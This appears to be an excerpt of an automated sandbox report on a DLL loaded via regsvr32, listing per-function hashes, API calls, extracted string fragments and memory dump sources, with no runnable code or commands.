                                                                                                                            • Opcode ID: a3f87b8c5f367064f797f5b9ceb23e0cb6ebb80f3dcd78d3f9f2145c33283283
                                                                                                                            • Instruction ID: e19a4e5e5cc386d69cf214405ae1c5674bfa6a2b8361dadaec425b008d0d638c
                                                                                                                            • Opcode Fuzzy Hash: a3f87b8c5f367064f797f5b9ceb23e0cb6ebb80f3dcd78d3f9f2145c33283283
                                                                                                                            • Instruction Fuzzy Hash: 4051F121B0C66BD1F72CDB22E95A77AA651BF44384F400539DD8D4EAD6DE3CF101EA22
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277864486.00007FFC66D31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC66D30000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.277856075.00007FFC66D30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277990668.00007FFC66D82000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277996591.00007FFC66D86000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.278023191.00007FFC66D89000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7ffc66d30000_regsvr32.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerEntryFunctionLookupPresentTerminateUnwindVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3778485334-0
                                                                                                                            • Opcode ID: 44244c45948aa76910f1429c67e23cf948153936c8457040e3babb9890c0c3d8
                                                                                                                            • Instruction ID: 665f30e0b07e66e6bc23eba55bb92e21f5c3541d6b4f58ead4f75eff7d279d4d
                                                                                                                            • Opcode Fuzzy Hash: 44244c45948aa76910f1429c67e23cf948153936c8457040e3babb9890c0c3d8
                                                                                                                            • Instruction Fuzzy Hash: 52311B35A0CBAAD5E7189B12F85836977A0FB84758F500039DACD4AB64DF7CE048EF60
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • _lock.LIBCMT ref: 00007FFC66D7E6EB
                                                                                                                            • free.LIBCMT ref: 00007FFC66D7E7E2
                                                                                                                              • Part of subcall function 00007FFC66D73024: HeapFree.KERNEL32(?,?,00000000,00007FFC66D72DDC,?,?,?,00007FFC66D72DFF,?,?,?,00007FFC66D7254F,?,?,?,00007FFC66D7262A), ref: 00007FFC66D7303A
                                                                                                                              • Part of subcall function 00007FFC66D73024: _errno.LIBCMT ref: 00007FFC66D73044
                                                                                                                              • Part of subcall function 00007FFC66D73024: GetLastError.KERNEL32(?,?,00000000,00007FFC66D72DDC,?,?,?,00007FFC66D72DFF,?,?,?,00007FFC66D7254F,?,?,?,00007FFC66D7262A), ref: 00007FFC66D7304C
                                                                                                                            • ___lc_codepage_func.LIBCMT ref: 00007FFC66D7E76B
                                                                                                                              • Part of subcall function 00007FFC66D76550: RtlCaptureContext.KERNEL32 ref: 00007FFC66D7658F
                                                                                                                              • Part of subcall function 00007FFC66D76550: IsDebuggerPresent.KERNEL32 ref: 00007FFC66D7662D
                                                                                                                              • Part of subcall function 00007FFC66D76550: SetUnhandledExceptionFilter.KERNEL32 ref: 00007FFC66D76637
                                                                                                                              • Part of subcall function 00007FFC66D76550: UnhandledExceptionFilter.KERNEL32 ref: 00007FFC66D76642
                                                                                                                              • Part of subcall function 00007FFC66D76550: GetCurrentProcess.KERNEL32 ref: 00007FFC66D76658
                                                                                                                              • Part of subcall function 00007FFC66D76550: TerminateProcess.KERNEL32 ref: 00007FFC66D76666
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277864486.00007FFC66D31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC66D30000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.277856075.00007FFC66D30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277990668.00007FFC66D82000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277996591.00007FFC66D86000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.278023191.00007FFC66D89000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7ffc66d30000_regsvr32.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _errno$ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerErrorFreeHeapLastPresentTerminate___lc_codepage_func_lockfree
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 178205154-0
                                                                                                                            • Opcode ID: 74de64cbd29ae749c01db9c906a5c8058d145dff36747eda2fd1744b72fc25a1
                                                                                                                            • Instruction ID: 0b49127314647898f570bddc39747dc59583ddfba1ea5f85e6c56d6340745734
                                                                                                                            • Opcode Fuzzy Hash: 74de64cbd29ae749c01db9c906a5c8058d145dff36747eda2fd1744b72fc25a1
                                                                                                                            • Instruction Fuzzy Hash: FCD1E322A0C2EAC5E7289F25D4406BDAF96BB81740F404135DACD5B796DF3CE841EF22
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • GetLocaleInfoW.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFC66D7E1C2), ref: 00007FFC66D7DFF2
                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFC66D7E1C2), ref: 00007FFC66D7E004
                                                                                                                            • GetLocaleInfoW.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFC66D7E1C2), ref: 00007FFC66D7E04F
                                                                                                                            • GetLocaleInfoW.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFC66D7E1C2), ref: 00007FFC66D7E0E1
                                                                                                                            • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFC66D7E1C2), ref: 00007FFC66D7E11B
                                                                                                                            • free.LIBCMT ref: 00007FFC66D7E12F
                                                                                                                              • Part of subcall function 00007FFC66D76C34: _FF_MSGBANNER.LIBCMT ref: 00007FFC66D76C64
                                                                                                                              • Part of subcall function 00007FFC66D76C34: RtlAllocateHeap.NTDLL(?,?,00000000,00007FFC66D730C0,?,?,00000000,00007FFC66D76B19,?,?,00000000,00007FFC66D76BC3), ref: 00007FFC66D76C89
                                                                                                                              • Part of subcall function 00007FFC66D76C34: _errno.LIBCMT ref: 00007FFC66D76CAD
                                                                                                                              • Part of subcall function 00007FFC66D76C34: _errno.LIBCMT ref: 00007FFC66D76CB8
                                                                                                                            • GetLocaleInfoA.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFC66D7E1C2), ref: 00007FFC66D7E145
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277864486.00007FFC66D31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC66D30000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.277856075.00007FFC66D30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277990668.00007FFC66D82000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277996591.00007FFC66D86000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.278023191.00007FFC66D89000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7ffc66d30000_regsvr32.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InfoLocale$_errno$AllocateByteCharErrorHeapLastMultiWidefree
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2309262205-0
                                                                                                                            • Opcode ID: 71a04b091aa06e394b105ea5eb29500c7d2471e259f2c6ae1c50144f40b044a4
                                                                                                                            • Instruction ID: 37aa4eebd96df04045011b45af66c5af854452f9bc5ff13a4e46cdeac3d249ac
                                                                                                                            • Opcode Fuzzy Hash: 71a04b091aa06e394b105ea5eb29500c7d2471e259f2c6ae1c50144f40b044a4
                                                                                                                            • Instruction Fuzzy Hash: 7351EA32A0C6AAC6E7289F12D8455BDB791FB447A4F544135DA9D0BBD4CF3CE440DB21
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277864486.00007FFC66D31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC66D30000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.277856075.00007FFC66D30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277990668.00007FFC66D82000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277996591.00007FFC66D86000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.278023191.00007FFC66D89000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7ffc66d30000_regsvr32.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _errno$DecodePointer_lock
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2175075375-0
                                                                                                                            • Opcode ID: e83d4e1a308f3a4c606242a395cb5e969118d697d0d9f70e8103cd5b86654c3e
                                                                                                                            • Instruction ID: b963de86734b8c9589bf3ba7175f54def46d8c3dc123a4391221c5dcd09a5830
                                                                                                                            • Opcode Fuzzy Hash: e83d4e1a308f3a4c606242a395cb5e969118d697d0d9f70e8103cd5b86654c3e
                                                                                                                            • Instruction Fuzzy Hash: A531A622A1C76AC2FB295A62945177EA691AFC4780F444434DF8C0FB86EF3CD411EB25
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277864486.00007FFC66D31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC66D30000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.277856075.00007FFC66D30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277990668.00007FFC66D82000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277996591.00007FFC66D86000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.278023191.00007FFC66D89000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7ffc66d30000_regsvr32.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerPresentTerminate
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1269745586-0
                                                                                                                            • Opcode ID: 4b9ca92828b1b5c60ed307038ce46a3bf90eb6ca82a158dafa7f71ad6e682487
                                                                                                                            • Instruction ID: 877d0d65a0083269fa8c1cb63996b44ceae83ffa376dfce849cdf062d37f63bb
                                                                                                                            • Opcode Fuzzy Hash: 4b9ca92828b1b5c60ed307038ce46a3bf90eb6ca82a158dafa7f71ad6e682487
                                                                                                                            • Instruction Fuzzy Hash: D6314D32A0CB9AC2DA288B55E4553AEA3A0FB88744F500139DACD47B59EF3CD149DF50
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: "+H$1l7.$M8;$]$d$]k$]k$94
                                                                                                                            • API String ID: 0-2447245168
                                                                                                                            • Opcode ID: 3fd6bef9004380659c47559ba6e3d81fe5eea7f701e849f333ef0deba45e7d13
                                                                                                                            • Instruction ID: 1221e244f5383d3e6569bf50eb566ee92e7d288cf12f4405919b94e37960c7a7
                                                                                                                            • Opcode Fuzzy Hash: 3fd6bef9004380659c47559ba6e3d81fe5eea7f701e849f333ef0deba45e7d13
                                                                                                                            • Instruction Fuzzy Hash: 3FB10D7160130CCBDBA9DF28C18A6DA3BE1FF48748F114129FD1A97261D774E919CB46
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277864486.00007FFC66D31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC66D30000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.277856075.00007FFC66D30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277990668.00007FFC66D82000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277996591.00007FFC66D86000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.278023191.00007FFC66D89000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7ffc66d30000_regsvr32.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InfoLocale
                                                                                                                            • String ID: ACP$OCP
                                                                                                                            • API String ID: 2299586839-711371036
                                                                                                                            • Opcode ID: 388ed1ec509bc17a1b1080bf0c7b12a90c89964bfa9f21f0ca41505682e31820
                                                                                                                            • Instruction ID: 494fdfdc2a39bc6f24ed1927bf7c5aaaf5607360120787c1a4f9b96639b17957
                                                                                                                            • Opcode Fuzzy Hash: 388ed1ec509bc17a1b1080bf0c7b12a90c89964bfa9f21f0ca41505682e31820
                                                                                                                            • Instruction Fuzzy Hash: 5A218721B0C55BC9FA289B21E8442BAA7A0FF44788F844134DECD4F655EF2CE545EF61
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 1h$I-$IY$QL&$li7$o
                                                                                                                            • API String ID: 0-890095520
                                                                                                                            • Opcode ID: d92cde7f9b8773e82faae5f21764c68a430e9ac7962d305d8d3ec3a014b69236
                                                                                                                            • Instruction ID: 3309774e0679b3a301b7d0c809474a48ec240f33eb9a68417431e078f6a2137f
                                                                                                                            • Opcode Fuzzy Hash: d92cde7f9b8773e82faae5f21764c68a430e9ac7962d305d8d3ec3a014b69236
                                                                                                                            • Instruction Fuzzy Hash: 72921875604BC88BCBB8DF24DC85BDD7BE0FB86305F20561DD85E9AA60CBB85645CB02
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 1$ {,$"$$-%$Rku$ i
                                                                                                                            • API String ID: 0-1845893065
                                                                                                                            • Opcode ID: 8a8483899f0d6f446eebdfc8e7bf7c7542960c12dc616770c4deeefd42d211ba
                                                                                                                            • Instruction ID: cb6ea2ed9b9de3b3effb5fe074f3157ffd1060f729125c5012da7c2884d2f589
                                                                                                                            • Opcode Fuzzy Hash: 8a8483899f0d6f446eebdfc8e7bf7c7542960c12dc616770c4deeefd42d211ba
                                                                                                                            • Instruction Fuzzy Hash: EB52D470544BCA8BCBB8CF24CC85BEF7BA0FB44306F155529D89A8A291DBB85749CF41
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: VUS/$YV~$p$@$EX$OX
                                                                                                                            • API String ID: 0-2743166816
                                                                                                                            • Opcode ID: 5155f202f137bac6474ba6043cf7c54f40f5ffdfe883d22239fc44ed7813b08b
                                                                                                                            • Instruction ID: 6ceb6cba6b0314249f0ec67deadc173c496f62a90fe3cec01f017443767c42d8
                                                                                                                            • Opcode Fuzzy Hash: 5155f202f137bac6474ba6043cf7c54f40f5ffdfe883d22239fc44ed7813b08b
                                                                                                                            • Instruction Fuzzy Hash: BD3213711097848FD3A9CF68C58A65BBBF0FBCA744F104A1DF68687260C7B6D949CB42
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: -!zt$Mv`b$R3T$d}9J$t:v$ru
                                                                                                                            • API String ID: 0-2100131636
                                                                                                                            • Opcode ID: e0551372703c1c57f1fc0d9d1de0f1be02ef62f192bed394747547d409ac2d0a
                                                                                                                            • Instruction ID: abddbd47ac15f5a8ffacaf8e31a06efd054a3dbd2afb1a66e8bbaa14beb483a4
                                                                                                                            • Opcode Fuzzy Hash: e0551372703c1c57f1fc0d9d1de0f1be02ef62f192bed394747547d409ac2d0a
                                                                                                                            • Instruction Fuzzy Hash: C1221BB050478C8BDBB8CF64C9897DD7BB0FB44308F10862DDA5AAB250CBB45686CF59
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: $$"`2$lbzZ$lmq$tro$kO
                                                                                                                            • API String ID: 0-2401169580
                                                                                                                            • Opcode ID: b22a75222821f6640e36d1476563fd6974371582067e8c17588d676730c46316
                                                                                                                            • Instruction ID: 279b0f6eedbbacd77816cba7ac57bf6919de5fbe0bc464da326619847ce4fcd1
                                                                                                                            • Opcode Fuzzy Hash: b22a75222821f6640e36d1476563fd6974371582067e8c17588d676730c46316
                                                                                                                            • Instruction Fuzzy Hash: BBF1C3709047488FDBA8DFA8D9867DDBBB1FB48304F20821DD84AEB255DB749A49CF41
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277864486.00007FFC66D31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC66D30000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.277856075.00007FFC66D30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277990668.00007FFC66D82000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277996591.00007FFC66D86000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.278023191.00007FFC66D89000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7ffc66d30000_regsvr32.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1445889803-0
                                                                                                                            • Opcode ID: 223c3edd6aa26ef4227c63ba9b3a174b47cd905fe72dc54f34602d1df15ca246
                                                                                                                            • Instruction ID: 74aa8a8f10c3d1f11085f9850615384bcfb900172b2a3b813b85a2ebeb357fc5
                                                                                                                            • Opcode Fuzzy Hash: 223c3edd6aa26ef4227c63ba9b3a174b47cd905fe72dc54f34602d1df15ca246
                                                                                                                            • Instruction Fuzzy Hash: E801C42162DA59C1EB448F22F84826963A0FB49B90F546134DEDE4B7A4DE3CD984EB50
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: )#?$EX.$PT$UbA$2f
                                                                                                                            • API String ID: 0-1318892062
                                                                                                                            • Opcode ID: f9a85fa51538b1a6c0e22373df85dddbbc427f24166f886711afb0f01761c199
                                                                                                                            • Instruction ID: a9b5704be98d3dd027f678fe08c59eda011257bdda9cf4ed25ea0f7660729633
                                                                                                                            • Opcode Fuzzy Hash: f9a85fa51538b1a6c0e22373df85dddbbc427f24166f886711afb0f01761c199
                                                                                                                            • Instruction Fuzzy Hash: 8B320DB190078C8BDBB8CF64C8856DD7BF0FB48318F50852DEA1A9B251DBB45685CF98
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: $T$?F$QP|m$qjf$tZp
                                                                                                                            • API String ID: 0-3477398917
                                                                                                                            • Opcode ID: a2afc25ca6c2e6ca488c7a804df3743aa45b21aa43371557c2da8ddda12b60f7
                                                                                                                            • Instruction ID: e54beaa769b94aae3cb673a52a2b60ade73482c6e5d3d936cdc9b6ae13d51efd
                                                                                                                            • Opcode Fuzzy Hash: a2afc25ca6c2e6ca488c7a804df3743aa45b21aa43371557c2da8ddda12b60f7
                                                                                                                            • Instruction Fuzzy Hash: 0B122870A0470CDFCF69DFA8C08A6DDBBF2FB44344F1091A9E816AB261D7759A19CB41
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: JQ$k&($t$v$x\J
                                                                                                                            • API String ID: 0-1134872184
                                                                                                                            • Opcode ID: e2b118cac14b957c819117e18deb076f69f9d4e25580e92a2151fd03385e5a66
                                                                                                                            • Instruction ID: 7c1fd17b310acde7e359d6be57bcfb6c2dd011f2caef592e77d3cba241376f6b
                                                                                                                            • Opcode Fuzzy Hash: e2b118cac14b957c819117e18deb076f69f9d4e25580e92a2151fd03385e5a66
                                                                                                                            • Instruction Fuzzy Hash: F312E0B0504709EFCB99DF28C18AADE7BF0FB48308F40812AF80A9B254D774DA58DB45
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: R$)H8$?rIc$L==$V
                                                                                                                            • API String ID: 0-2512384441
                                                                                                                            • Opcode ID: 0d280c2f9ee604a9d8763362a2e2c249d7a205bc5c068130deea404b5e8e02a7
                                                                                                                            • Instruction ID: 6f6f9af97a41f07aad9f9d1cbd67af5334817a93c453241fb2a5d498ae2065c2
                                                                                                                            • Opcode Fuzzy Hash: 0d280c2f9ee604a9d8763362a2e2c249d7a205bc5c068130deea404b5e8e02a7
                                                                                                                            • Instruction Fuzzy Hash: 3541D0B090074E8BCF48CF64D49A5DE7FB0FB68398F20421DE856A6250D3B896A5CFC5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: Qq$bt$vird$+$S
                                                                                                                            • API String ID: 0-3373980505
                                                                                                                            • Opcode ID: 46bb33aa035ecbbdf74cf68df8db4d7c020810c30b71dbb4fbdebc27907f7b4b
                                                                                                                            • Instruction ID: 8c34661c01ca41a1498f33dadfb9b2381b3c020394efcb6cfebc1cbd8490f91c
                                                                                                                            • Opcode Fuzzy Hash: 46bb33aa035ecbbdf74cf68df8db4d7c020810c30b71dbb4fbdebc27907f7b4b
                                                                                                                            • Instruction Fuzzy Hash: 8831C2B081038A8FDB45CF64C88A5DE7BF0FB58358F115A19F869A6250D3B4D668CF81
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277864486.00007FFC66D31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC66D30000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.277856075.00007FFC66D30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277990668.00007FFC66D82000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277996591.00007FFC66D86000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.278023191.00007FFC66D89000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7ffc66d30000_regsvr32.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InfoLocale$_getptd
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1743167714-0
                                                                                                                            • Opcode ID: b0fda2b9e43f1133ad190798799e4c2ffbba67a865a56d93994de7f284044248
                                                                                                                            • Instruction ID: e0a3811b83ab8677e6e0395060a2ad2c3e8e9c820b685df3538532c32eec312f
                                                                                                                            • Opcode Fuzzy Hash: b0fda2b9e43f1133ad190798799e4c2ffbba67a865a56d93994de7f284044248
                                                                                                                            • Instruction Fuzzy Hash: 38615D72B0C59ADADA6C9A60D9843FDB791FB88305F50013AC79D8B290CF3CE564DB52
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: V$@$P9$^_"
                                                                                                                            • API String ID: 0-1880944046
                                                                                                                            • Opcode ID: 14fe4b6354f8c882e246ec0bcf45ce0c6e4a33b057813c2d4cef38f5cb1d7b15
                                                                                                                            • Instruction ID: ef3f81825b514374c5d287d432cdf068934c0dc0259921085eace1de493a05f6
                                                                                                                            • Opcode Fuzzy Hash: 14fe4b6354f8c882e246ec0bcf45ce0c6e4a33b057813c2d4cef38f5cb1d7b15
